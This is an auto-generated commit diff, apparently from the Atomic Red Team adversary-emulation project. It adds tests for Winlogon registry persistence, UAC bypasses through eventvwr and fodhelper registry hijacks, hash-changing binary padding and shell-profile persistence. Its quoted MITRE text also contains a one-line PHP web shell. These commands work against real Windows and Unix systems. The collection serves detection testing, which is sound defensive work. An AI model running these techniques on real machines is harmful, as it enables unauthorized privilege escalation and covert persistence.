security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=validate_atomics_generate_docs branch=master

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2018-12-13 16:06:36 +00:00
parent 0f576dd03f
commit 07079c9ed7
11 changed files with 502 additions and 78 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1004/T1004.md
+76
View File
@@ -0,0 +1,76 @@
# T1004 - Winlogon Helper DLL
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1004)
<blockquote>Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in <code>HKLM\Software\[Wow6432Node\]Microsoft\Windows NT\CurrentVersion\Winlogon\</code> and <code>HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\</code> are used to manage additional helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013)
Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to abuse: (Citation: Cylance Reg Persistence Sept 2013)
* Winlogon\Notify - points to notification package DLLs that handle Winlogon events
* Winlogon\Userinit - points to userinit.exe, the user initialization program executed when a user logs on
* Winlogon\Shell - points to explorer.exe, the system shell executed when a user logs on
Adversaries may take advantage of these features to repeatedly execute malicious code and establish Persistence.</blockquote>
## Atomic Tests
- [Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell](#atomic-test-1---winlogon-shell-key-persistence---powershell)
- [Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell](#atomic-test-2---winlogon-userinit-key-persistence---powershell)
- [Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell](#atomic-test-3---winlogon-notify-key-logon-persistence---powershell)
<br/>
## Atomic Test #1 - Winlogon Shell Key Persistence - PowerShell
PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe|
#### Run it with `powershell`!
```
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, #{binary_to_execute}" -Force
```
<br/>
<br/>
## Atomic Test #2 - Winlogon Userinit Key Persistence - PowerShell
PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_execute | Path of binary to execute | Path | C:\Windows\System32\cmd.exe|
#### Run it with `powershell`!
```
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Userinit" "Userinit.exe, #{binary_to_execute}" -Force
```
<br/>
<br/>
## Atomic Test #3 - Winlogon Notify Key Logon Persistence - PowerShell
PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_execute | Path of notification package to execute | Path | C:\Windows\Temp\atomicNotificationPackage.dll|
#### Run it with `powershell`!
```
New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
```
<br/>
atomics/T1009/T1009.md
+11 -8
View File
@@ -4,23 +4,26 @@
## Atomic Tests
- [Atomic Test #1 - Pad Evil Binary to Change Hash](#atomic-test-1---pad-evil-binary-to-change-hash)
- [Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd](#atomic-test-1---pad-binary-to-change-hash---linuxmacos-dd)
<br/>
## Atomic Test #1 - Pad Evil Binary to Change Hash
Copies cat to create an "evil binary" and pads it with a zero to change the hash without harming execution
## Atomic Test #1 - Pad Binary to Change Hash - Linux/macOS dd
Uses dd to add a zero to the binary to change the hash
**Supported Platforms:** macOS, Linux
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| binary_to_pad | Path of binary to be padded | Path | /tmp/EvilBinary|
#### Run it with `sh`!
```
cp /bin/cat /tmp/evilCat
md5sum /tmp/evilCat
dd if=/dev/zero bs=1 count=1 >> /tmp/evilCat
md5sum /tmp/evilCat
/tmp/evilCat .bash_profile
md5sum #{binary_to_pad}
dd if=/dev/zero bs=1 count=1 >> #{binary_to_pad}
md5sum #{binary_to_pad}
```
<br/>
atomics/T1088/T1088.md
+67
View File
@@ -14,6 +14,12 @@ Another bypass is possible through some Lateral Movement techniques if credentia
- [Atomic Test #1 - Bypass UAC using Event Viewer](#atomic-test-1---bypass-uac-using-event-viewer)
- [Atomic Test #2 - Bypass UAC using Event Viewer - PowerShell](#atomic-test-2---bypass-uac-using-event-viewer---powershell)
- [Atomic Test #3 - Bypass UAC using Fodhelper](#atomic-test-3---bypass-uac-using-fodhelper)
- [Atomic Test #4 - Bypass UAC using Fodhelper - PowerShell](#atomic-test-4---bypass-uac-using-fodhelper---powershell)
<br/>
@@ -34,3 +40,64 @@ reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executabl
cmd.exe -c eventvwr.msc
```
<br/>
<br/>
## Atomic Test #2 - Bypass UAC using Event Viewer - PowerShell
PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
#### Run it with `command_prompt`!
```
New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force
Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\eventvwr.msc"
```
<br/>
<br/>
## Atomic Test #3 - Bypass UAC using Fodhelper
Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
#### Run it with `command_prompt`!
```
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute"
fodhelper.exe
```
<br/>
<br/>
## Atomic Test #4 - Bypass UAC using Fodhelper - PowerShell
PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| executable_binary | Binary to execute with UAC Bypass | path | C:\Windows\System32\cmd.exe|
#### Run it with `powershell`!
```
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\fodhelper.exe"
```
<br/>
atomics/T1156/T1156.md
+25 -6
View File
@@ -8,13 +8,15 @@ These files are meant to be written to by the local user to configure their own
## Atomic Tests
- [Atomic Test #1 - .bash_profile and .bashrc](#atomic-test-1---bash_profile-and-bashrc)
- [Atomic Test #1 - Add command to .bash_profile](#atomic-test-1---add-command-to-bash_profile)
- [Atomic Test #2 - Add command to .bashrc](#atomic-test-2---add-command-to-bashrc)
<br/>
## Atomic Test #1 - .bash_profile and .bashrc
xxx
## Atomic Test #1 - Add command to .bash_profile
Adds a command to the .bash_profile file of the current user
**Supported Platforms:** macOS, Linux
@@ -22,11 +24,28 @@ xxx
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| script | path to script | path | /path/to/script.py|
| command_to_add | Command to add to the .bash_profile file | string | /path/to/script.py|
#### Run it with `sh`!
```
echo "#{script}" >> ~/.bash_profile
echo "#{script}" >> ~/.bashrc
echo "#{command_to_add}" >> ~/.bash_profile
```
<br/>
<br/>
## Atomic Test #2 - Add command to .bashrc
Adds a command to the .bashrc file of the current user
**Supported Platforms:** macOS, Linux
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| command_to_add | Command to add to the .bashrc file | string | /path/to/script.py|
#### Run it with `sh`!
```
echo "#{command_to_add}" >> ~/.bashrc
```
<br/>
atomics/index.md
+13 -3
View File
@@ -1,7 +1,8 @@
# All Atomic Tests by ATT&CK Tactic & Technique
# persistence
- [T1156 .bash_profile and .bashrc](./T1156/T1156.md)
- Atomic Test #1: .bash_profile and .bashrc [macos, linux]
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- [T1015 Accessibility Features](./T1015/T1015.md)
- Atomic Test #1: Attaches Command Prompt As Debugger To Process - osk [windows]
- Atomic Test #2: Attaches Command Prompt As Debugger To Process - sethc [windows]
@@ -126,7 +127,10 @@
- [T1084 Windows Management Instrumentation Event Subscription](./T1084/T1084.md)
- Atomic Test #1: Persistence [windows]
- Atomic Test #2: Persistence Cleanup [windows]
- T1004 Winlogon Helper DLL [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1004 Winlogon Helper DLL](./T1004/T1004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
- Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
# defense-evasion
- [T1134 Access Token Manipulation](./T1134/T1134.md)
@@ -136,9 +140,12 @@
- Atomic Test #2: Download & Execute via PowerShell BITS [windows]
- Atomic Test #3: Persist, Download, & Execute [windows]
- [T1009 Binary Padding](./T1009/T1009.md)
- Atomic Test #1: Pad Evil Binary to Change Hash [macos, linux]
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
- [T1088 Bypass User Account Control](./T1088/T1088.md)
- Atomic Test #1: Bypass UAC using Event Viewer [windows]
- Atomic Test #2: Bypass UAC using Event Viewer - PowerShell [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- [T1191 CMSTP](./T1191/T1191.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
@@ -330,6 +337,9 @@
- Atomic Test #1: Application Shim Installation [windows]
- [T1088 Bypass User Account Control](./T1088/T1088.md)
- Atomic Test #1: Bypass UAC using Event Viewer [windows]
- Atomic Test #2: Bypass UAC using Event Viewer - PowerShell [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1157 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
atomics/index.yaml
+292 -54
View File
@@ -46,23 +46,40 @@ persistence:
created: '2017-12-14T16:46:06.044Z'
identifier: T1156
atomic_tests:
- name: ".bash_profile and .bashrc"
description: 'xxx
- name: Add command to .bash_profile
description: 'Adds a command to the .bash_profile file of the current user
'
supported_platforms:
- macos
- linux
input_arguments:
script:
description: path to script
type: path
command_to_add:
description: Command to add to the .bash_profile file
type: string
default: "/path/to/script.py"
executor:
name: sh
command: |
echo "#{script}" >> ~/.bash_profile
echo "#{script}" >> ~/.bashrc
command: 'echo "#{command_to_add}" >> ~/.bash_profile
'
- name: Add command to .bashrc
description: 'Adds a command to the .bashrc file of the current user
'
supported_platforms:
- macos
- linux
input_arguments:
command_to_add:
description: Command to add to the .bashrc file
type: string
default: "/path/to/script.py"
executor:
name: sh
command: 'echo "#{command_to_add}" >> ~/.bashrc
'
T1015:
technique:
id: attack-pattern--9b99b83a-1aac-4e29-b975-b374950551a3
@@ -347,63 +364,58 @@ persistence:
}
'':
technique:
id: attack-pattern--514ede4c-78b3-4d78-a38b-daddf6217a79
id: attack-pattern--c16e5409-ee53-4d79-afdc-4099dc9292df
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Winlogon Helper DLL
description: "Winlogon.exe is a Windows component responsible for actions at
logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.
Registry entries in <code>HKLM\\Software\\[Wow6432Node\\]Microsoft\\Windows
NT\\CurrentVersion\\Winlogon\\</code> and <code>HKCU\\Software\\Microsoft\\Windows
NT\\CurrentVersion\\Winlogon\\</code> are used to manage additional helper
programs and functionalities that support Winlogon. (Citation: Cylance Reg
Persistence Sept 2013) \n\nMalicious modifications to these Registry keys
may cause Winlogon to load and execute malicious DLLs and/or executables.
Specifically, the following subkeys have been known to be possibly vulnerable
to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify
- points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit
- points to userinit.exe, the user initialization program executed when a
user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell
executed when a user logs on\n\nAdversaries may take advantage of these features
to repeatedly execute malicious code and establish Persistence."
name: Web Shell
description: |-
A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (see, for example, China Chopper Web shell client). (Citation: Lee 2013)
Web shells may serve as [Redundant Access](https://attack.mitre.org/techniques/T1108) or as a persistence mechanism in case an adversary's primary access methods are detected and removed.
external_references:
- external_id: T1004
url: https://attack.mitre.org/techniques/T1004
- external_id: T1100
url: https://attack.mitre.org/techniques/T1100
source_name: mitre-attack
- external_id: CAPEC-579
url: https://capec.mitre.org/data/definitions/579.html
source_name: capec
- url: https://technet.microsoft.com/en-us/sysinternals/bb963902
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
source_name: TechNet Autoruns
- url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence,
Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.'
source_name: Cylance Reg Persistence Sept 2013
- url: https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
description: Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down
the China Chopper Web Shell - Part I. Retrieved March 27, 2015.
source_name: Lee 2013
- url: https://www.us-cert.gov/ncas/alerts/TA15-314A
description: US-CERT. (2015, November 13). Compromised Web Servers and Web
Shells - Threat Awareness and Guidance. Retrieved June 8, 2016.
source_name: US-CERT Alert TA15-314A Web Shells
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_version: '1.0'
x_mitre_contributors:
- Praetorian
x_mitre_data_sources:
- Windows Registry
- Anti-virus
- Authentication logs
- File monitoring
- Netflow/Enclave netflow
- Process monitoring
x_mitre_detection: |-
Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns) New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious.
Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: (Citation: Lee 2013)
Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
x_mitre_permissions_required:
- Administrator
<code><?php @eval($_POST['password']);></code>
Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as running [cmd](https://attack.mitre.org/software/S0106) or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network. (Citation: US-CERT Alert TA15-314A Web Shells)
x_mitre_effective_permissions:
- SYSTEM
- User
x_mitre_platforms:
- Linux
- Windows
- macOS
x_mitre_system_requirements:
- Adversary access to Web server with vulnerability or account to upload and
serve the Web shell file.
type: attack-pattern
kill_chain_phases:
- phase_name: persistence
kill_chain_name: mitre-attack
- phase_name: privilege-escalation
kill_chain_name: mitre-attack
modified: '2018-10-17T00:14:20.652Z'
created: '2017-05-31T21:30:20.148Z'
created: '2017-05-31T21:31:13.061Z'
atomic_tests: []
T1103:
technique:
@@ -3565,6 +3577,120 @@ persistence:
$FilterConsumerBindingToCleanup | Remove-WmiObject
$EventConsumerToCleanup | Remove-WmiObject
$EventFilterToCleanup | Remove-WmiObject
T1004:
technique:
id: attack-pattern--514ede4c-78b3-4d78-a38b-daddf6217a79
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Winlogon Helper DLL
description: "Winlogon.exe is a Windows component responsible for actions at
logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.
Registry entries in <code>HKLM\\Software\\[Wow6432Node\\]Microsoft\\Windows
NT\\CurrentVersion\\Winlogon\\</code> and <code>HKCU\\Software\\Microsoft\\Windows
NT\\CurrentVersion\\Winlogon\\</code> are used to manage additional helper
programs and functionalities that support Winlogon. (Citation: Cylance Reg
Persistence Sept 2013) \n\nMalicious modifications to these Registry keys
may cause Winlogon to load and execute malicious DLLs and/or executables.
Specifically, the following subkeys have been known to be possibly vulnerable
to abuse: (Citation: Cylance Reg Persistence Sept 2013)\n\n* Winlogon\\Notify
- points to notification package DLLs that handle Winlogon events\n* Winlogon\\Userinit
- points to userinit.exe, the user initialization program executed when a
user logs on\n* Winlogon\\Shell - points to explorer.exe, the system shell
executed when a user logs on\n\nAdversaries may take advantage of these features
to repeatedly execute malicious code and establish Persistence."
external_references:
- external_id: T1004
url: https://attack.mitre.org/techniques/T1004
source_name: mitre-attack
- external_id: CAPEC-579
url: https://capec.mitre.org/data/definitions/579.html
source_name: capec
- url: https://technet.microsoft.com/en-us/sysinternals/bb963902
description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
Retrieved June 6, 2016.
source_name: TechNet Autoruns
- url: https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order
description: 'Langendorf, S. (2013, September 24). Windows Registry Persistence,
Part 2: The Run Keys and Search-Order. Retrieved April 11, 2018.'
source_name: Cylance Reg Persistence Sept 2013
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_version: '1.0'
x_mitre_contributors:
- Praetorian
x_mitre_data_sources:
- Windows Registry
- File monitoring
- Process monitoring
x_mitre_detection: |-
Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns) New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious.
Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
x_mitre_permissions_required:
- Administrator
- SYSTEM
x_mitre_platforms:
- Windows
type: attack-pattern
kill_chain_phases:
- phase_name: persistence
kill_chain_name: mitre-attack
modified: '2018-10-17T00:14:20.652Z'
created: '2017-05-31T21:30:20.148Z'
identifier: T1004
atomic_tests:
- name: Winlogon Shell Key Persistence - PowerShell
description: 'PowerShell code to set Winlogon shell key to execute a binary
at logon along with explorer.exe.
'
supported_platforms:
- windows
input_arguments:
binary_to_execute:
description: Path of binary to execute
type: Path
default: C:\Windows\System32\cmd.exe
executor:
name: powershell
command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
"Shell" "explorer.exe, #{binary_to_execute}" -Force
'
- name: Winlogon Userinit Key Persistence - PowerShell
description: 'PowerShell code to set Winlogon userinit key to execute a binary
at logon along with userinit.exe.
'
supported_platforms:
- windows
input_arguments:
binary_to_execute:
description: Path of binary to execute
type: Path
default: C:\Windows\System32\cmd.exe
executor:
name: powershell
command: 'Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\"
"Userinit" "Userinit.exe, #{binary_to_execute}" -Force
'
- name: Winlogon Notify Key Logon Persistence - PowerShell
description: 'PowerShell code to set Winlogon Notify key to execute a notification
package DLL at logon.
'
supported_platforms:
- windows
input_arguments:
binary_to_execute:
description: Path of notification package to execute
type: Path
default: C:\Windows\Temp\atomicNotificationPackage.dll
executor:
name: powershell
command: |
New-Item "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" -Force
Set-ItemProperty "HKCU:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" "logon" "#{binary_to_execute}" -Force
defense-evasion:
T1134:
technique:
@@ -3914,22 +4040,24 @@ defense-evasion:
created: '2017-05-31T21:30:22.096Z'
identifier: T1009
atomic_tests:
- name: Pad Evil Binary to Change Hash
description: 'Copies cat to create an "evil binary" and pads it with a zero
to change the hash without harming execution
- name: Pad Binary to Change Hash - Linux/macOS dd
description: 'Uses dd to add a zero to the binary to change the hash
'
supported_platforms:
- macos
- linux
input_arguments:
binary_to_pad:
description: Path of binary to be padded
type: Path
default: "/tmp/EvilBinary"
executor:
name: sh
command: |
cp /bin/cat /tmp/evilCat
md5sum /tmp/evilCat
dd if=/dev/zero bs=1 count=1 >> /tmp/evilCat
md5sum /tmp/evilCat
/tmp/evilCat .bash_profile
md5sum #{binary_to_pad}
dd if=/dev/zero bs=1 count=1 >> #{binary_to_pad}
md5sum #{binary_to_pad}
T1088:
technique:
id: attack-pattern--ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be
@@ -4044,6 +4172,61 @@ defense-evasion:
command: |
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
cmd.exe -c eventvwr.msc
- name: Bypass UAC using Event Viewer - PowerShell
description: 'PowerShell code to bypass User Account Control using Event Viewer
and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
'
supported_platforms:
- windows
input_arguments:
executable_binary:
description: Binary to execute with UAC Bypass
type: path
default: C:\Windows\System32\cmd.exe
executor:
name: command_prompt
command: |
New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force
Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\eventvwr.msc"
- name: Bypass UAC using Fodhelper
description: 'Bypasses User Account Control using the Windows 10 Features on
Demand Helper (fodhelper.exe). Requires Windows 10.
'
supported_platforms:
- windows
input_arguments:
executable_binary:
description: Binary to execute with UAC Bypass
type: path
default: C:\Windows\System32\cmd.exe
executor:
name: command_prompt
command: |
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute"
fodhelper.exe
- name: Bypass UAC using Fodhelper - PowerShell
description: 'PowerShell code to bypass User Account Control using the Windows
10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
'
supported_platforms:
- windows
input_arguments:
executable_binary:
description: Binary to execute with UAC Bypass
type: path
default: C:\Windows\System32\cmd.exe
executor:
name: powershell
command: |
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\fodhelper.exe"
T1191:
technique:
id: attack-pattern--7d6f590f-544b-45b4-9a42-e0805f342af3
@@ -9361,6 +9544,61 @@ privilege-escalation:
command: |
reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
cmd.exe -c eventvwr.msc
- name: Bypass UAC using Event Viewer - PowerShell
description: 'PowerShell code to bypass User Account Control using Event Viewer
and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
'
supported_platforms:
- windows
input_arguments:
executable_binary:
description: Binary to execute with UAC Bypass
type: path
default: C:\Windows\System32\cmd.exe
executor:
name: command_prompt
command: |
New-Item "HKCU:\software\classes\mscfile\shell\open\command" -Force
Set-ItemProperty "HKCU:\software\classes\mscfile\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\eventvwr.msc"
- name: Bypass UAC using Fodhelper
description: 'Bypasses User Account Control using the Windows 10 Features on
Demand Helper (fodhelper.exe). Requires Windows 10.
'
supported_platforms:
- windows
input_arguments:
executable_binary:
description: Binary to execute with UAC Bypass
type: path
default: C:\Windows\System32\cmd.exe
executor:
name: command_prompt
command: |
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /ve /d "#{executable_binary}" /f
reg.exe add hkcu\software\classes\ms-settings\shell\open\command /v "DelegateExecute"
fodhelper.exe
- name: Bypass UAC using Fodhelper - PowerShell
description: 'PowerShell code to bypass User Account Control using the Windows
10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
'
supported_platforms:
- windows
input_arguments:
executable_binary:
description: Binary to execute with UAC Bypass
type: path
default: C:\Windows\System32\cmd.exe
executor:
name: powershell
command: |
New-Item "HKCU:\software\classes\ms-settings\shell\open\command" -Force
New-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty "HKCU:\software\classes\ms-settings\shell\open\command" -Name "(default)" -Value "#{executable_binary}" -Force
Start-Process "C:\Windows\System32\fodhelper.exe"
T1179:
technique:
id: attack-pattern--66f73398-8394-4711-85e5-34c8540b22a5
atomics/linux-index.md
+3 -2
View File
@@ -1,7 +1,8 @@
# Linux Atomic Tests by ATT&CK Tactic & Technique
# persistence
- [T1156 .bash_profile and .bashrc](./T1156/T1156.md)
- Atomic Test #1: .bash_profile and .bashrc [macos, linux]
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- T1067 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1176 Browser Extensions](./T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
@@ -130,7 +131,7 @@
# defense-evasion
- [T1009 Binary Padding](./T1009/T1009.md)
- Atomic Test #1: Pad Evil Binary to Change Hash [macos, linux]
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
- [T1146 Clear Command History](./T1146/T1146.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #2: Clear Bash history (echo) [linux, macos]
atomics/macos-index.md
+3 -2
View File
@@ -1,7 +1,8 @@
# macOS Atomic Tests by ATT&CK Tactic & Technique
# persistence
- [T1156 .bash_profile and .bashrc](./T1156/T1156.md)
- Atomic Test #1: .bash_profile and .bashrc [macos, linux]
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- [T1176 Browser Extensions](./T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
@@ -190,7 +191,7 @@
# defense-evasion
- [T1009 Binary Padding](./T1009/T1009.md)
- Atomic Test #1: Pad Evil Binary to Change Hash [macos, linux]
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
- [T1146 Clear Command History](./T1146/T1146.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #2: Clear Bash history (echo) [linux, macos]
atomics/matrix.md
+1 -1
View File
@@ -58,7 +58,7 @@
| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Signed Script Proxy Execution](./T1216/T1216.md) | | | | | | |
| | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Software Packing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Windows Management Instrumentation Event Subscription](./T1084/T1084.md) | | [Space after Filename](./T1151/T1151.md) | | | | | | |
| | | Winlogon Helper DLL [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | [Winlogon Helper DLL](./T1004/T1004.md) | | Template Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
| | | | | [Timestomp](./T1099/T1099.md) | | | | | | |
| | | | | [Trusted Developer Utilities](./T1127/T1127.md) | | | | | | |
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | |
atomics/windows-index.md
+10 -1
View File
@@ -9,6 +9,9 @@
- [T1009 Binary Padding](./T1009/T1009.md)
- [T1088 Bypass User Account Control](./T1088/T1088.md)
- Atomic Test #1: Bypass UAC using Event Viewer [windows]
